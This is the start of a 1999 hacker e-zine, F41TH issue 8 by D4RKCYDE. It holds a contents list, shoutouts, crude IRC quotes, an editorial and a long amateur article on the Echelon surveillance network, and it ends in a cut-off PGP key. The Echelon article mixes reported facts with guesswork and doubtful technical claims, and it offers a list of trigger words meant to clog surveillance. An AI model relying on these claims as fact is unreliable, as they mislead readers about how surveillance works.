________ _______________ ____ __.______________.___.________ ________ \______ \ / | \______ \ |/ _|\_ ___ \__ | |\______ \ \_____ \ | | \ / | || _/ < / \ \// | | | | \ _(__ < | ` \/ ^ / | \ | \ \ \___\____ | | ` \/ \ /_______ /\____ ||____|_ /____|__ \ \______ / ______|/_______ /______ / \/ |__| \/ \/ \/\/ \/ \/ _______________________________ ____________________ __________________ \______ \______ \_ _____// _____/\_ _____/ \ \__ ___/ | ___/| _/| __)_ \_____ \ | __)_ / | \| | | | | | \| \/ \ | \/ | \ | |____| |____|_ /_______ /_______ //_______ /\____|__ /____| \/ \/ \/ \/ \/ [ http://darkcyde.phunc.com ] [ mailto: hybrid@dtmf.org ] yyyyyssssyyyy yyyyssssyyyy yyyy yyyy |lS$$ yy $$$$ """" yy lS$$ S$$$ S$$$$$ $$$$$ S$$$ssssyyyy :|lS$ ""yyyyy yyyyssss|lS$ lS$$ lS$$ yy$$$$$ lS$$ yy lS$$ :||lS$$ $$$$$ :|lS yy :|lS |lS$ |lS$ $$ yyyy |lS$ $$ |lS$ :::|l ,$$$$$ ::|l $$ ::|l :|lS :|lS $$ :|lS :|lS $$ :|lS ::::| $$$$$$ :::| $$ :::| ::|l ::|l $$ ::|l ::|l $$ ::|l .:::: ....... .:::....:::: .::| ..:|....:::| .::| .. .::| +-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+ +-+ +-+-+-+-+ +-+-+-+-+ |F|4|1|T|H| |M|4|G|G|A|Z|I|N|E| |I|S|S|U|E| |8| |J|U|L|Y| |1|9|9|9| +-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+ +-+ +-+-+-+-+ +-+-+-+-+ E I G H T f41th is a production of D4RKCYDE (C) #darkcyde EFnet "you are approaching Y2K at 3600 seconds per hour" EIGHT-E wikkid ch1ckie: so what? so fuck off and stay outta my channel *** antifire was kicked by ch1ckie (bewm) *** ch1ckie sets mode: +b *!*@werd.nac.net Fuck w1t h3r, and f33l her wr4th!!!!!! ----------------------------------------------------------------------------- OOO-(z}-|[ F41th 8 Editorial ]--( z0mba )--{z)-|[OOO OOO-(z}-|[ Echelon - an In-depth(ish) look ]--( Warchild )--{z)-|[OOO OOO-(z}-|[ Echelon - continued research ]--( hybrid )--{z)-|[OOO OOO-(z}-|[ SprintNet Local Access Tel. No's ]--( redshadow )--{z)-|[OOO OOO-(z}-|[ AT&T Conferencing Information ]--( redshadow )--{z)-|[OOO OOO-(z}-|[ Computer Virii ]--( [JaSuN] )--{z)-|[OOO OOO-(z}-|[ Network Programming ]--( z0mba )--{z)-|[OOO OOO-(z}-|[ USRobotics Netserver/8 ]--( hybrid )--{z)-|[OOO OOO-(z}-|[ Views on hacking, past and present ]--( shiloh )--{z)-|[OOO OOO-(z}-|[ ACTS advanced communications ]--( lowtek )--{z)-|[OOO OOO-(z}-|[ Some Mi6 employee list, submited ]--( anon )--{z)-|[OOO OOO-(z}-|[ HELLASPAC ]--( monty )--{z)-|[OOO OOO-(z)-|[ UK Various O8OO scans ]--( force )--(z)-|[OOO OOO-(z)-|[ IRC logz - bonus force logz! ]--( hmm )--(z)-|[OOO OOO-(z)-|[ Intro to hacking with NFS ]--( msinister )--(z)-|[OOO OOO-(z)-|[ US 18OO pocket scan ]--( anon )--(z)-|[OOO OOO-(z)-|[ Cisco Router IP routing ]--( wiz )--(z)-|[OOO OOO-(z)-|[ Introduction to IP addressing ]--( wiz )--(z)-|[OOO OOO-(z)-|[ UK O8OO scanz ]--( trionix )--(z)-|[OOO OOO-(z)-|[ Network Programing ]--( zomba )--(z)-|[OOO OOO-(z)-|[ Signalling from phone to exchange ]--( shadowx )--(z)-|[OOO ----------------------------------------------------------------------------- [03:10] HERE COMES THE KAT KILLER [03:10] THE KAT KILLER THATS ME 41n't n0th1n 4s s4t1sfy1ng 4s bl0w1ng y0ur 0wn trump3t " But the Echelon system is a whole new critter; it doesn't monitor the communications of just Saddam Hussein and his merry men, or the post-Soviet purveyors of glow-in-the-dark explosives - nope, the Echelon system keeps an eye on everybody. " ---Party Line Civil Liberties, February 10, 1998 ----------------------------------------------------------------------------- D4RKCYDE Staff... [ zomba ]------[ iTs aLl in THe tEqniq ] * http://darkcyde.phunc.com [ hybrid ]------[ inHumAn eRRor ] * #darkcyde efnet (no lamerz) [ downtime ]------[ ThE mAn frOm UnCLe ] * D4RKCYDE COMMUNICATIONS [ force ]------[ ThE HuMAN tOnElOck ] * 1997--1998--1999--WhyTOOkay [ shadowx ]------[ SliM SHaDy ] * ---------------------------- [ msinister ]------[ dOnt mEss wIt hIm ] * All material/publications [ shylock ]------[ DIgital pImp ] * [c] D4RKCYDE 1997,1998,1999. [ lowtek ]------[ SkOOling sAtPStn ] * ---------------------------- [ bodie ]------[ ThE zOmbie ] * hybrid@dtmf.org (submissions) [ sintax ]------[ ThE mAn fRom DelMoNtE ] * zomba@etc.phunc.com (mail) [ microwire ]------[ WhATs GoING On mAn ] * find us on the pstn bitch... "Once you're owned, youre probably going to be owned for quite a long time." --- elite h4xwh0rE ----------------------------------------------------------------------------- SHOUTZ (werd to the following ppl, creatures, non-terestrial entitys) [ 9x ][ b4b0 ][ med ][ mobsters ][ phunc ][ dtmf.org ][ knight ][ substance ] [ ch1ckie ][ gr1p ][ t1p ][ gb ][ jorge ][ vixen ][ loco ][ red-led ][ xio ] [ lusta ][ port ][ extriad ][ aktiver ][ asshair ][ jennicide ][ oeb ] [ s- ] [ siezer ][ infidel ][ klaus-floride ][ chimmy ][ darkcyde ][ gossi ][ cab ] [ oclet ][ pbxphreak ][ dave ][ wirepair ][ digiphreq ][ gov-boi ][ henk ] [ devious ][ prez ][ katkilla ][ vaxenboy ][ simmeth ][ voltage ][ dgtlfokus ] FUCK YOUZ (that means we pitty your lameness) [ atoi ][ PLUK ][ atoi ][ mrsp00n ][ armageddon ][ anti-social mag ][ atoi ] P L E -- fuck you for giving us shouts without our authorisation. PhoneLosers of the UK, PhoneLosers England.. you put the 4 in l4me. THOUGHT If a lamer has 5 lame brain cells and loses two of them, does the fact that he now has only 3 lame brain cells make him any less of a lamer? ----------------------------------------------------------------------------- *** Now talking in #b4b0 the black dick is a myth. tip: i know heh it retains more blood when non-erect, thus it may seem larger. BUT erect, all penises are the same length. don't ask me why er don't ask me how i know this. So thats how b4b0 come up with such a kewl zine :] -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ Editorial ]::::::::::::[OO--[ by z0mba ]---[ zomba@addicts.org ]::: -->[OO]:::::::::::::::::::::::::::::::[ http://members.xoom.com/phuk ]::::::: * z0mba has returned. Gone 4hrs 57mins 23secs [03:18] «ø» Nothing was logged while you were away. And that ladies and gentlemen, is how popular I am on IRC. Oh well, i'll just go off quetly and throw myself off a bridge or summit. I guess your all wondering why the hell i'm doing the editorial and not hybrid, and the truth is that hybrid has decided that I am way leeter than him and therefore should be in control of f41th (HEH, i'm full o d4 sh1t). Okay, so maybe hybrid just wanted a rest okay, geez, stop hassling me about it. If you think that i've done a crap job at compiling/editing this issue then send all your flames to z0mba@fuckyou.co.uk and i'll be sure to reply to every last one of them. I'd also just like to add that f41th 8 is the *biggest* issue ever, which just about puts at the top of the zine writing community, in laymans terms, we 0wn. So whats happened since f41th 7? erm..not much to be honest, an article appeared on bbc.co.uk claiming a huge hacker-crackdown was about to happen in the UK, but as of now, I know of no-one that has been raided so i'm guessing that was all bollox. Oh yeah, one last thing, a_kitten was unanomously voted sexiest bird on EFnet by D4RKCYDE (go to barby.org to see for yourself). The huge DC voting panel of me and hybrid came to this conclusion whilst sitting around bored fuckless. Okay so thats about it, so lets get on w1t d1s sh1t. Big shout to hybrids dog, so far this month its scratched my cellphone, pissed on bodie (LOL) and bitten my ankles/hands/shoes/knees/arms etc, etc. [22:43] ZOMBA OWNS MY LAME ASS! She's come to her senses, its only a matter of time before you all do! --------------------------------------------------------------- The raiders hit early this morning, banging the door about 4 AM, me groggily peeking out, a subpoena wadded into my shirt, grinning like shit, saying you're fucked this time Johnny Wee-dick --------------------------------------------------------------- " you are now a Script Kiddy .. enjoy your new life of stupidity... " --- DrHamstah -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ Echelon ]::::::::::::::::::::[OO--[ by Warchild (aka Polymorph ]::: -->[OO::::::::::::::::::::::::::::::::::::::[ w4rch1ld@phreaker.net ]:::::::: ___________________________________________________________ õõõõõõõ[ Format: ]õõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõ =========================================================== õõõõõõõõõ[ Introduction ]õõõõõõõõõ õõõõõõõõõ[ Background ]õõõõõõõõõ õõõõõõõõõ[ Interception Methods and capabilities ]õõõõõõõõõ õõõõõõõõõ[ Station Details ]õõõõõõõõõ õõõõõõõõõ[ Defeation ]õõõõõõõõõ =========================================================== õõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõõ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +++++++++++++++++++ | Introduction: | +++++++++++++++++++ I'll start off by basically defining what Echelon is. Echelon is what many people have thought and feared existed for many years. Why else would the governments protest against strong public encryption if they weren't spying on us? Project Echelon is a project, thought up and run, by the US NSA (National Security Agency) with a little backup from the CIA (Central Intelligence Agency). What Echelon does is intercept as much telecommunications data as possible to search for data which may be of interest to them. This is done by tapping into the telecommunications network and searching for key data such as words, names and telephone numbers. As for the reason I have written this. Basically, I've always been highly interested in what the secret services are up to. I first heard of Echelon about a year ago, and then completely forgot about it again until I read Antidote 5 (www.thepoison.org/antidote) which quoted an article from www.theage.com about Echelon. After that I started researching it and soon realised that information on it was not too readily available, especially not all in one place and is often incomplete. Thus, I thought I may as well write up what I find to bring as much of the information I can right to your screen for anyone who is interested. +++++++++++++++++ | Background: | +++++++++++++++++ After the Cold War, the NSA wanted to be able to spy on the world. However, unlike many of the projects set up during the cold war, Echelon was not targeted at military information, (although some is intercepted in the pacific), rather the interception of terrorism, weapons proliferation and economic intelligence. The first generation of Echelon went by the name "Project P415". (Incidentally, we are now in the second generation of Echelon). During 1946-1947 the UK, Australia, New Zealand and Canada created the commonwealth SIGINT (Signals Intelligence) organisation under leadership of GCHQ (Government Communication Headquarters - Cheltenham, UK). Later in 1947, the US and the UK signed the UKUSA agreement, with the other SIGINT countries joining automatically due to their alliance with the UK via the Commonwealth SIGINT agreement. This was the formal creation of the UKUSA SIGINT community. Initially, the size of the Echelon system was quite small with only 2 bases intercepting traffic (or at least satellite traffic) and specifically build for the Echelon project. One base was in Morwestow in Cornwall (UK),built in 1972, and the other at Yakima, Washington (US), built in 1971. The Echelon network which connects the 2 countries is a large, private WAN using TCP/IP and is known by the name "Platform". While the UK and the US were the only countries actually intercepting anything, Canada, Australia and New Zealand were responsible for analysing particular data. In the late 70's, with the launch of new Intelsat satellites, more bases were required to maintain global interception capabilities. Thus, 2 more bases were built, once again, one by GCHQ and the other by the NSA. GCHQ built one in Hong Kong, which was dismantled in 1994 ready for the hand over. The NSA's second base was build in Sugar Grove, West Virginia, and collects intelligence from civilian satellites. Plans for Australia, Canada and New Zealand to build interception stations were made in 1989. It is thought, and there is no evidence concerning this, that these plans were made when these countries introduced new computer systems. This however seems a bit strange to me though as why are 3 different countries all upgrading their computer systems at the same time? An echelon interception station was built in New Zealand at Waihopai, near Blenheim, South Island and has the codename 'Flintlock'. Waihopai's task is to monitor two Pacific communications satellites and intercept all communications from and between the South Pacific islands. Information on the base in Canada is particularly scarce. It is located in Leitrium, Ontario and has 4 satellite receiving dishes. An old base, which is located at Shoal Bay in the Northern Territory - Australia became the first Australia Echelon station and has 9 satellite receivers locked into regional communications satellites. The second Australian station was built in 1994 and is situated in Kojarena, near Geraldton, in Western Australia. The station has a only 4 satellite receivers. At some point, a station was also built in Puerto Rico. I had to get the Atlas out for this one as I had no idea where the fuck that was, and then discovered it's down in the Caribbean. Apparently it's US owned for some reason though which explains how they managed to get one down there. I suspect it monitors the islands, Columbia and Venezuela. Now that you've got a brief history of how the project was developed and expanded, let me explain how the system actually works. Each interception station posses a computer known as a Dictionary. Each SIGINT agency provides a "Watch List" of between 10 and 50 key words (approximately) that are of interest to them that they wish to look for. This list is not just a continuos list of words, rather a well organised list set into categories, identified by a four digit, numeric code. These 4 digit codes, in turn, translate to another code which identifies the type of data it is. For example, Diplomatic data from France has the code FRD, similarly, Economic data from Australia is given the code AUE. This is known as Standard Case Notation. Unfortunately, I do not know any numeric equivalents! The lists can include phone numbers, country names, personal names, organisations, addresses (both land and email) as well as just general words. Criteria can also be set so that only particular combinations are found. For example e-mails from a particular address which also include another specified word. As each SIGINT member submits it's own list, each base has a total of 5 lists, one belonging to it's own SIGINT agency, and another 4, belonging to each of the other UKUSA SIGINT members. The software for the dictionary's, including necessary decryption software, are provided by the NSA (what a surprise!). An important distinction between interception and collection should be made here. Interception is literally just that, the interception of the communications data. Data which meets collection requirements, is then recorded and collected. All data which does not meet collection requirements is discarded at this point. It is unclear as to the selection process as there is conflicting information. Some sources claim only 1 match is required, however if this is the case this would produce absolutely huge amounts of collected data which does have to be sorted through manually. I can't see how the SIGINT agencies would have the man power to do this however! Other sources have suggested that multiple matches are required. I suspect it is a combination of both. I.E a sequence of individual queries are run on the intercepted data to find matches effectively. This way, some matches would only be counted if other matches were also made, and others would just require one match. When a match is made, a copy is made. The data required will vary depending on the nature of the communication. For example, a collected email would be recorded by means of the entire e-mail, along with the appropriate IP addresses, times, etc. A telephone call would be recorded, and later transcribed, with appropriate information such as CLID of the caller or it's destination, duration, etc. Depending on whose Watch List matches on a transmission were made will determine where the information ends up. Dictionaries are completely automated. Thus, people in the particular country where the interception is made and the Dictionary located, do not get told what matches are made concerning other SIGINT agencies watch lists. Collected data is sent directly to the appropriate agency via their private WAN mentioned earlier. Each match transmission is also sent with the code name of the base at which it was intercepted, as well as the numeric code of the category of the Watch List matches. The efforts of the echelon system are divided thus: Australia's DSD - Eastern Indian Ocean, South West pacific and a small portion of South East Asia intelligence. UK's GCHQ - Central Europe, Africa and the Soviet Union east of the Urals intelligence. Canadian CSE - Northern Soviet Union and parts of Europe intelligence. New Zealand's GCSB - South West Pacific (only a small portion) intelligence. USA's NSA - All remaining areas of interest's intelligence. Each country also intercepts it's own traffic and interception equipment may be owned by either that country or the NSA (e.g. Menwith Hill in Yorkshire). On a side note, some satellite receivers are encased by domes called radomes. These are there to protect the equipment both from whether which could damage it, and to prevent it's exact angle from being seen (I.E. what it's pointing at). Why some receivers are encased in radomes and others not I do not know! Anyway, radomes look like huge golf balls and are really quit big. The existence of the system has obviously been kept secret since the day it was first thought up in a tucked away building in suburban Washington which was until very recently the headquarters of the Special Collection Service of the NSA. They've denied everything over the years, however all their lying was made useless in late May when Martin Brady, director of the Defence Signals Directorate in Canberra (Australia), came clean about it's existence. When governments claim they do/did not know about it's existence, they're probably not lying about that! When I say government, I mean government in the sense of priminister and cabinet. Basically, anyone can become an MP. All that is required is that you are of that nationality, and those who have dual nationality are normally required to give up the other if they wish to become an MP. Now imagine the vetting that takes place in order to become a member of a security agency. I don't think I need explain further! In 1983 Margaret Thatcher abused her powers by asking GCHQ to bug some cabinet members phones to see if they were "on side". GCHQ, in turn, asked CSE to do it so that they could deny involvement of it's agents. Thus, a primeinister or president asking it's security agency to provide come ' intercepted economic data' seems just as likely. When Britain was trying to see through its highly controversial deal to sell Hawk fighters and other arms to Indonesia, staff at the Office of National Assessments feared that the British would pass DSD intelligence on East Timor to President Soeharto in order to win the lucrative contract. ++++++++++++++++++++++++++++++++++++++++++++ | Interception Methods and Capabilities: | ++++++++++++++++++++++++++++++++++++++++++++ The capabilities of Echelon have in some circumstances been over exaggerated when they have been written about in the past. It is still unclear as to exactly what volume of the worlds traffic is intercepted, and even more unclear how it is done. While researching this I found both disturbing information and stuff which made me realise that Echelon is not such a threat as people thought, or, at least, not such a threat to the general public (what ever they happened to be doing that is illegal) as some people thought. I'll explain interception methods in no particular order. Special nuclear submarines were constructed by the US Navy specifically for part of Project Echelon. A lot of international traffic travels via undersea cables as it takes up too much bandwidth to bounce every international call off a satellite, and there is really no need! Thus, this is where a lot of traffic is intercepted. These cables are extremely deep, and the Americans are the only ones *known* to have the capabilities to do what I am about to describe. Once these cables are laid, they don't exactly get much attention! The telephone companies certainly don't have the equipment to go down there to fuck about with them, and thus placing a bug down there has a very low chance of being found. This is done by placing a 'pod' next to the cables which pick up leaked radio emissions. These pods have a reasonably long life (between 1-2 years) and thus do not need changing that often. The submarines where designed so that placing and retrieval of a pod could be done via machinery, meaning no one was ever needed outside the sub to help. Because the pods go next to the cables, no damage is ever caused, and would only ever be found, ordinarily, when the cable is to be replaced. This method has one problem though, which is that they obviously don't work on phiber optic cables as it does not radiate any emissions. This was a bit of a problem, and no way was devised to intercept the transmissions on phiber optics. How long they spent trying to find a way I do not know, probably not *too* long as they knew another method was at their disposal. Where do the undersea cables go when they come out of the water? Onto the phone network, and are transmitted in the usual fashion of microwave repeaters. This is where interception on undersea phiber optic cables takes place, the point at which the cable comes out of the water and is hooked up to a microwave repeater. National calls are transmitted up and down the country via microwave repeaters. These are those towers with dishes on and send the signal to each other. Because microwave travels in a straight line, all the towers must be in line with each other, otherwise the signal will be lost. The reason why microwave repeaters are needed is a bit sketchy! (This is where certain people on IRC realise why I was asking about this a week or so back! :) ). Repeaters will definitely be needed because of the earth's curvature, however, whether they are also used to boost the signal or not no one seems to know. Logic would suggest that some of the signal will be lost on it's way from tower to tower, and thus it would need boosting. This however conflicts a bit with some other information. When a signal is repeated, some of the signal misses it because of the earth's curvature and some of the signal passes on into outer space. Microwave is great because unlike HF radio waves, they are not bounced back by the atmosphere but instead pass straight through it. An extremely poor diagram attempts to show this below. The signal is being sent from tower to tower with the angle being corrected each time to counter the curvature of the earth. The signal which misses the repeater, passes on by and providing it doesn't go hitting too many obstacles, passes into outer space. This is where our friendly SIGINT organisation place a satellite to intercept the signal, and bounce it down directly to somewhere else. Please do not misunderstand what I mean when I say bounce. I don't mean it literally reflects the signal back. What will happen is the signal will be intercepted by the satellite, cleaned up and amplified, encrypted and then sent to a base such as Mewith Hill. microwave ________________________|-------/ /\ /\ /\`\,_ |~~~~~~~\ Satellite ************** /\ / ******************** /New signal for SIGINT ********[ Earth ]********** / Organisation Apologies for my poor asci skills, it's not particularly each to draw that in a limited amount of space but I'm sure you all get the idea anyway. It seems surprising that these signals would be strong enough to pass out into space, but it is apparently what happens. When a SIGINT organisation can not get a building erected near one of the microwave repeaters of an undersea phiber cable, this is the method that is used to intercept the traffic. If they are able to get a building near by, they simply tap directly into the towers signal. A lot of the time, this is not actually necessary. This method is used when the UKUSA SIGINT community want to intercept national traffic from a country of interest when they have no other choice. Repeaters are required every 30 - 50 km. Some countries hand the traffic directly over, and this is where many of you won't be the slightest bit surprised! Hmm, what countries do you think hand all their traffic straight over to the appropriate SIGINT organisation (regardless of whether or not they realise that it actually for use also in Echelon, as well as any other reason.)? Surprise surprise, the UK and the USA. The USA I don't know anything about, whether only certain telcos pass it on or whether they all do and why. In the UK, as far as I am aware, only BT do. However, seeing as BT is the largest Telco in the UK and the majority of traffic from other telcos are going to pass through BT equipment at one time or another, this does not really cause any problems. This does in fact have greater implications than you may have immediately realised. Not only does this include all national traffic, but all international traffic from, to and passing through either the US or the UK. I.E. A fax from Spain to Ireland is going to pass through the UK, and thus the call has automatically been intercepted. This makes life much easier in making Echelon work! The last method of interception is from the satellites, and that is what some of those wonderful large satellite receivers are doing. Most of the worlds international calls which need to be bounced off satellites use the Intelsats which sit above the equator. Traffic is intercepted from these normally by satellite receivers in radomes, possibly due to the size of the things (and they really are huge!) There is a separate chain of interception stations which intercept HF radio, however I know very little about this and is of no real interest to me as I expect that only particular channels are watched and the amount of useful data which can be obtained from HF as part of the Echelon network is rather limited. "So, how does electronic data such as e-mails, etc get intercepted?" I hear you ask. Let me first begin with what isn't. Web pages! Web pages are public access (the majority of the time) and thus important processing time would be being wasted if every web page was also checked for words of interest. Pages of interest are located in other fashions, but lets face it, there are really very few pages on the web that are really of much interest to them! Sites of interest are monitored by visiting each day by a bot. The bot searches for new files and updates and takes copies of what it finds. Sites which are known to be checked in this way are particular sites promoting powerful free encryption. (You can find out if your site is watched by simply looking at you logs. If the same government (or possibly even none government) IP address connects every day at the same time, then you know you are!). But really, very few pages are monitored! Usenet is also not monitored as part of Echelon. This too is public and would waste time, especially as there is so much crap on Usenet. Everyone knows Usenet is monitored, both by the governments and by organisations, a lessons some people in alt.ph.uk still don't seem to have learned (fuckwits). For example, in the UK, the Defence Evaluation and Research Agency maintains a 1 terabyte data base of the previous 90 days of Usenet posts and is searched daily for information of interest. They *do not care* about kidi pr0n or what twat in alt.ph.uk is posting 0800 Internet dial-ups. That is not their job! They are looking for *intelligence* , it's up to other organisations to care about that kind of stuff, often the organisation it involves. What is intercepted is e-mail, faxes and telexes. These are then run through the dictionary's just like all other intercepted data. A system known as N-Gram is in place which works out the topic of a communication (such as an e-mail) by looking at provided documents, reading over them and deciding what key words are present, etc. This is the learning phase. It is then used by comparing what it 'knows' to other communications, looking for the key words and deciding what the topic is. While you may think that this would be a bit unreliable, it has in fact been proven to be very effective. Internet traffic is intercepted in a number of ways. A large volume passes through the satellites, but this is a secondary method. Most interception takes place when it enters the US (and possibly the UK), or when it reaches major Internet exchanges. The odds are pretty high that it'll pass through the US at one time or another due to the way routing is done, so it's really pretty easy. I will now put your mind at rest a bit. While I believe the dictionary's can look for particular voices (although it must be very rarely done), there is no effective word spotting system in existence! Instead, particular phone numbers are flagged and related information is recorded and traffic analysis is in place. Incidentally, pager and mobile phone traffic are also intercepted. There is also another network which has been said is linked to the Echelon network which specifically targets Russian communications. This includes countries which are not part of the UKUSA SIGINT community though so how that is run I do not know. The base at Pine Gap near Alice Springs in Central Australia (which has 12 radomes!) is said to be apart of this, picking up information sent down to it by American spy satellites. There was some discussion somewhere (not named to prevent attention from being drawn to it) about the type of computers used. It was claimed that NORAD were using computers much more powerful than Cray's and that the dictionary's were also likely to be of a similar power in order to cope with the shear volume of data. It is however thought that Cray's *are* used after all. How many I simply don't know! If I remember correctly (which I may well not do as it was 1996), at that time the most number of Cray's any single site had that *didn't* belong to the government was 3. Thus, Cray's are certainly used by the government. Perhaps they're not quite as technologically advanced concerning processing power as one may have thought! +++++++++++++++++++++ | Station Details | +++++++++++++++++++++ The completeness of this list I do not know and is only aimed as the main Echelon stations. United Kingdom: Menwith Hill in Yorkshire, mentioned previously, was constructed in 1955 and has run many projects in the past. It has continually grown in size and mainly run by NSA members. If you ever wanted to see a loaded gun at close range and pointing at you, hang around the gates for a bit! The NSA are very rude and impatient! If you're interested in further Menwith Hill info mail m e and i'll sort something out as i have loads on it. It runs over 250 projects, of which I know of about 10 ish. As previously mentioned, there is also a base in Morwestow in Cornwall. This was one of the first Echelon stations and was built especially in 1972! I think is has about 9 radomes now and once again has a large proportion of NSA people working there. Last December I managed to find some of GCHQ, - Cheltenham's satellite receivers. There is a dictionary at one of the 2 GCHQ sites in Cheltenham, although I do not know which. Presumably these satellite receivers are hooked straight up to Cheltenham, but what they are intercepting I don't know! None were in radomes though and there were about 8 or 9 of them. The last dictionary in Britain is located in London itself! The building owned by GCHQ and located in Westminster and intercepts all Telex traffic, to, from or passing through London. While it is controlled by GCHQ it is operated by security vetted BT employees. Something I forgot to say earlier was how BT got into all this. Back in the days of the Post Office controlling the phone network, it was of course government owned (as the post office still is). Back then, when wire taps were in place it was Post Office employees in an MI5 building in London that did all of the transcribing! As the Post Office had been working for the government for years, by the time the telephone section was privatised and BT came along they presumably had a little chat and just followed on where the Post Office had left off! Thus, of course, BT and GCHQ, along with MI5 and MI6, have always had a very "chummy" relationship! Hmmm, wonder what BT gets out of this? No code names have been found for any of the bases and all intercept satellite traffic apart from London. Australia: Ahh, Australia, my favourite country. Australia's main contribution to the Echelon project is an ultra-modern intelligence base in Kojarena, near Geraldton in Western Australia. The station was built in the early 1990s and has a mere 4 satellite receivers. The second Australian station is an older, larger base, however not so technologically advanced. It is located at Shoal Bay in the Northern Territory and has 9 satellite receivers locked into regional communications satellites. Both stations are occupied by both NSA members and Australians, however the number of people present at each station I do not know. I suspect the base in the west is relatively empty as it's modern and quite small. Probably just a few dozen technicians, and some armed guards, but don't quote me on that. The Shoal Bay station is likely to participate in other projects of it's own so a much higher population is expected. I have been unable to find out either of the bases code names. New Zealand: New Zealand runs an Echelon satellite interception site at Waihopai, near Blenheim, South Island and has the codename 'Flintlock'. Waihopai's task is to monitor two Pacific communications satellites and intercept all communications from and between the South Pacific islands. This base is rather small in comparison with the others and has only 2 radomes. The fact that this base is so small probably is probably one of the reasons that it is unmanned (with the exception of sleeping guards). United States of America: The NSA have a base at Yakima, Washington which has 9 radomes. Seeing as it's on their own soil and the NSA like to have their fingers everywhere i suspect that the base has a large population and probably has quite a few people working there. Yakima has the codename 'Cowboy'. A US Navy-run (as in they claim it's for the Navy. Just like the base at Mewith hill is supposedly an RAF base) satellite receiving station is also at Sugar Grove, West Virginia, and collects intelligence from civilian satellites. It has 6 Radomes. There is also a base in Puerto Rico. I had to get the Atlas out for this one as i had no idea where the fuck that was, and then discovered it's down in the Caribbean. Apparently it's US owned though for some reason which explains how they managed to get one down there. I suspect it monitors the islands, Columbia and Venezuela. A base that I have zero information on is one in Washington state, 200km south west of Seattle. I have no idea what any of the other code names are. Canada: Canada have a satellite interception station at Leitrim, near Ottawa, Ontario which has 4 satellite receivers. No further information on this has come to light. +++++++++++++++ | Defeation | +++++++++++++++ There's not really all that much that can be done. British phone calls have been tapped for 40 years, and it took until May for confirmation of Echelon's existence. Their is a campaign to close Menwith Hill however i find it extremely surpassing if they got it. They may however manage to stop it growing any bigger. This too is what the European Parliament want to happen (have NSA building requests to expand it rejected). The best thing to do is block the system up with crap by adding a list of buzz words to e-mails. Obviously don't do it on sensitive shit or using an account provided by your employer but general stuff is fine. Encrypting e-mails will obviously prevent 'them' from finding the buzz words unless of course they have decryption capabilities built into the dictionary's using back doors (such as that implemented in the Clipper Chip) otherwise your transmission will just flow as if Echelon didn't exist but that's not the point. Basically, if you're talking about really dodgy stuff, you use your common sense and meet face to face in a crowded place like a foot ball match or something. Adding the list below to your e-mails should get it intercepted although it won't really waste any of their time as when the SIGINT employee comes to look at it they will immediately see it's just a time waster and discard it. A function may have also been built into the dictionary's to discard interceptions which have matches, but have matches in say 3 entirely unrelated categories. Anyway, I would have thought that this list would meet at least 1 of the Watch List words: SILKWORTH, conspiracy, Allah, DSD, ARABSAT, MOONPENNY, bomb, assassinate, aeroplane, nuclear weapons, atomic, plutonium, NSA, GCHQ, weapons grade, president, USA, infiltrate, double agent, vengeance, MI5, MI6, conceal, gun, execute, eliminate, suicide bomber, white house, pentagon, white sands, dreamland, freedom ridge, CIA, ASIS, ASIO, DOD, Spy, FBI, venona, project disseminate, operation blue bird, lights in the sky, Big Bird, encounter, alien, illegal, Cuban, Chinese, Russian, sympathiser, explode, chemical warfare, sleeper, government, embassy As a last word, i was contacted by a number of members of the government while researching this who had heard in one way or another what i was doing. Where in the world these people were i will not disclose however all claimed that they were/had been members of a UKUSA SIGINT community member. I do not question their positions, however i must admit that some of their knowledge of Echelon seemed either some what limited, or were attempting to play it down. Well, that's it. I may have missed some bits out and there will obviously be mistakes in there for which I apologies, but I have limited resources / sources. Feel free to send any comments or corrections to me, and if you have further info, send away! Warchild (aka Polymorph) #2600-uk w4rch1ld@phreaker.net warchild@dangerous-minds.com This article may not be reproduced, in part or in whole, without the prier consent of the author. (In other words just get in contact with me). -----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGPfreeware 5.5.3i for non-commercial use mQGiBDXfYxMRBADnmgdRPnZxbWkRcMssec1MWdMRttWocPrwbHnu3MXxtjHTrLeB O03wWwOLFFziNhAPSYVzVGoS4orLNIWpIKKD5cHlbDTHtSGHX7mXDQHZIOLugWgn q1s5L7RmiO8zsg/6DS2RQBoaLGjJSk13JbZbrir8Ewrvz3+nOnCbI9zalwCg/6ow FaR7xI5h3sPd+rnSmrs7BrUEAMV4PuzQjcZ8CwJajn1yw2PCs96sqj99ZjA0y0hY EUJALsUkZ5SQjOLRmzkTmmNK8qmwKmZ8/dPXzPgDXq4QTK338GDEeK1b0MnzwtXl /KRh1gZQC73ydLB0fcrp6gswEQ5RzvHStoQgk0Q2TrRVSAW6IDAp3fDSy0/Vp5KL BX/lBADdjiLlB7jJgj5g5G2iQejNUXN1uQ0HN6YDFQAhBE2alOrctJ3+PzeXJKvU 9cJaMLdxhQtjeFXHPui7KUH0+oP+Bsm1S5rYHYLXoIxhJqn7u+EAS6QNQnDXEeqU OwxXqbSr0GR7FTjjuAJUZrR0wH9LroRNRrVd6eH2cZSY6xOjyrQgd2FyY2hpbGQg PHBvbHltb3JwaEBob3RtYWlsLmNvbT6JAEsEEBECAAsFAjXfYxMECwMCAQAKCRAo N2vIs9pmzML7AJ9OmHXQriDGVBRWUAHZfxL92S6IcQCgxENjPrHipa5C7LQkqZjN oGBvs525BA0ENd9jFBAQAPkYoH5aBmF6Q5CV3AVsh4bsYezNRR8O2OCjecbJ3HoL rOQ/40aUtjBKU9d8AhZIgLUV5SmZqZ8HdNP/46HFliBOmGW42A3uEF2rthccUdhQ yiJXQym+lehWKzh4XAvb+ExN1eOqRsz7zhfoKp0UYeOEqU/Rg4Soebbvj6dDRgjG zB13VyQ4SuLE8OiOE2eXTpITYfbb6yUOF/32mPfIfHmwch04dfv2wXPEgxEmK0Ng w+Po1gr9oSgmC66prrNlD6IAUwGgfNaroxIe+g8qzh90hE/K8xfzpEDp19J3tkIt 